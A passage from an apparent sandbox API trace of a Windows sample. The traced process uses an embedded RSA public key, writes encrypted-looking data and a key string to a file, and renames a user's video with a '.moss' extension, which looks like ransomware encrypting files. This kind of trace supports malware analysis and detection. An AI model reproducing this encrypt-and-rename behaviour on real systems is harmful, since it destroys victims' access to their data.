KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.108] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2dd98) returned 1 [0170.109] CryptCreateHash (in: hProv=0xd2dd98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0170.109] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0170.110] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0170.110] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0170.110] GetLastError () returned 0x0 [0170.110] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0170.110] CryptReleaseContext (hProv=0xd2dd98, dwFlags=0x0) returned 1 [0170.110] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0170.110] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0170.110] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0170.110] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0170.110] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0170.111] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0170.111] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0170.111] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc1e8 | out: hHeap=0xcd0000) returned 1 [0170.111] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc200 | out: hHeap=0xcd0000) returned 1 [0170.111] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0170.111] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0170.111] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.111] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0170.111] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2a0 [0170.111] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc200 [0170.111] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0170.111] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fc1e8 [0170.111] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd330 [0170.111] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0xd57fe0 [0170.111] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0170.111] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0170.111] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0170.111] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0170.111] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a50 [0170.111] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0170.111] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0170.111] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc200 | out: hHeap=0xcd0000) returned 1 [0170.111] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0170.111] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc1e8 | out: hHeap=0xcd0000) returned 1 [0170.111] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0170.111] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0170.111] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0170.111] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.111] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0170.112] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0170.112] GetCurrentThreadId () returned 0x324 [0170.112] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0170.112] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0x3b49bf0 [0170.112] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0170.112] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0170.112] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35ceae8 [0170.112] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0170.112] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0170.112] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35deb08 [0170.112] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.112] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.112] GetCurrentThreadId () returned 0x324 [0170.112] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.112] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.112] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0170.112] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.112] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.112] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.112] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.112] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0170.112] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0170.112] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0170.112] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cc38 [0170.112] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0170.112] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0170.112] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0170.112] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0170.112] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0170.112] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0170.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0170.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0170.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0170.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0170.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0170.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0170.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc1e8 [0170.113] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0170.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd300 [0170.113] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0170.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0170.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0170.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0170.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0170.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc200 [0170.113] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0170.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0170.113] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0170.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc1d0 [0170.113] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0170.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbb70 [0170.113] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0170.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd280 [0170.113] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0170.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0170.113] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0170.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc00 [0170.113] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0170.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc218 [0170.113] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0170.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbc90 [0170.114] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc00 | out: hHeap=0xcd0000) returned 1 [0170.114] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2e0 [0170.114] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0170.114] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0170.114] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0170.114] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0170.114] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc1e8 | out: hHeap=0xcd0000) returned 1 [0170.114] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc1e8 [0170.114] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0170.114] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b48820 [0170.114] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0170.114] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa26a0 [0170.114] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0170.114] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b48a30 [0170.114] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.114] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0xdc53e8 [0170.114] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0170.114] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2588 [0170.114] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc1e8 | out: hHeap=0xcd0000) returned 1 [0170.114] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x200) returned 0x3b48c48 [0170.114] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0170.114] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd3e658 [0170.114] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0170.114] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2dd98 | out: hHeap=0xcd0000) returned 1 [0170.115] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0170.115] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd3e658 | out: hHeap=0xcd0000) returned 1 [0170.115] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a10 | out: hHeap=0xcd0000) returned 1 [0170.115] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0170.115] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48a30 | out: hHeap=0xcd0000) returned 1 [0170.115] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48c48 | out: hHeap=0xcd0000) returned 1 [0170.115] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc53e8 | out: hHeap=0xcd0000) returned 1 [0170.115] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0170.115] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc218 | out: hHeap=0xcd0000) returned 1 [0170.115] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0170.115] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0170.115] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0170.115] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc200 | out: hHeap=0xcd0000) returned 1 [0170.115] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc1d0 | out: hHeap=0xcd0000) returned 1 [0170.115] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0170.115] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0170.115] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0170.115] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc1b8 | out: hHeap=0xcd0000) returned 1 [0170.115] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4bed8 | out: hHeap=0xcd0000) returned 1 [0170.115] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.115] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f7c30 | out: hHeap=0xcd0000) returned 1 [0170.115] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cc38 | out: hHeap=0xcd0000) returned 1 [0170.115] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2470 | out: hHeap=0xcd0000) returned 1 [0170.115] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e06d0 | out: hHeap=0xcd0000) returned 1 [0170.115] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0170.115] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0170.115] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0170.115] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44ac8 | out: hHeap=0xcd0000) returned 1 [0170.115] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0170.115] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0170.115] WriteFile (in: hFile=0x664, lpBuffer=0x3b62d40*, nNumberOfBytesToWrite=0x148a9, lpNumberOfBytesWritten=0x401fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b62d40*, lpNumberOfBytesWritten=0x401fb14*=0x148a9, lpOverlapped=0x0) returned 1 [0170.116] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b62d40 | out: hHeap=0xcd0000) returned 1 [0170.116] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x148ae, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.116] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0170.116] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0170.116] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b41730 [0170.116] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x428) returned 0x3b48820 [0170.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b48820, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 41 [0170.116] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x430) returned 0x3b48c50 [0170.116] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.116] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41730 | out: hHeap=0xcd0000) returned 1 [0170.117] WriteFile (in: hFile=0x664, lpBuffer=0x3b48c50*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b48c50*, lpNumberOfBytesWritten=0x401fb50*=0x28, lpOverlapped=0x0) returned 1 [0170.117] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48c50 | out: hHeap=0xcd0000) returned 1 [0170.117] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0170.117] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0170.117] CloseHandle (hObject=0x664) returned 1 [0170.119] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2840 [0170.119] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x870) returned 0x3b48820 [0170.119] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2840 | out: hHeap=0xcd0000) returned 1 [0170.119] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\x5rI0NtYZ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\x5ri0ntyz.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\x5rI0NtYZ.flv.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\x5ri0ntyz.flv.moss")) returned 1 [0170.120] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.120] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0170.120] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0170.121] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd34af8 | out: hHeap=0xcd0000) returned 1 [0170.121] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef26b590, ftCreationTime.dwHighDateTime=0x1d5e2e4, ftLastAccessTime.dwLowDateTime=0x47d67d70, ftLastAccessTime.dwHighDateTime=0x1d5e67c, ftLastWriteTime.dwLowDateTime=0x47d67d70, ftLastWriteTime.dwHighDateTime=0x1d5e67c, nFileSizeHigh=0x0, nFileSizeLow=0x148ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="x5rI0NtYZ.flv", cAlternateFileName="X5RI0N~1.FLV")) returned 0 [0170.121] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0170.121] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0170.121] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c768 | out: hHeap=0xcd0000) returned 1 [0170.121] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0170.121] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362ca80 | out: hHeap=0xcd0000) returned 1 [0170.121] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41118 | out: hHeap=0xcd0000) returned 1 [0170.121] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cb30 | out: hHeap=0xcd0000) returned 1 [0170.121] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cb88 | out: hHeap=0xcd0000) returned 1 [0170.121] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c558 | out: hHeap=0xcd0000) returned 1 [0170.122] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b410b0 | out: hHeap=0xcd0000) returned 1 [0170.122] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41320 | out: hHeap=0xcd0000) returned 1 [0170.122] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41388 | out: hHeap=0xcd0000) returned 1 [0170.122] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c6b8 | out: hHeap=0xcd0000) returned 1 [0170.122] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b413f0 | out: hHeap=0xcd0000) returned 1 [0170.122] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c9d0 | out: hHeap=0xcd0000) returned 1 [0170.122] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41458 | out: hHeap=0xcd0000) returned 1 [0170.122] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c978 | out: hHeap=0xcd0000) returned 1 [0170.122] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c920 | out: hHeap=0xcd0000) returned 1 [0170.122] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b414c0 | out: hHeap=0xcd0000) returned 1 [0170.122] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c8c8 | out: hHeap=0xcd0000) returned 1 [0170.122] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41528 | out: hHeap=0xcd0000) returned 1 [0170.122] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c870 | out: hHeap=0xcd0000) returned 1 [0170.122] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c4a8 | out: hHeap=0xcd0000) returned 1 [0170.122] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41180 | out: hHeap=0xcd0000) returned 1 [0170.122] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71ba0 | out: hHeap=0xcd0000) returned 1 [0170.122] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cad8 | out: hHeap=0xcd0000) returned 1 [0170.122] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0170.122] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71ba0 [0170.122] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0170.122] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.122] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.122] HeapFree 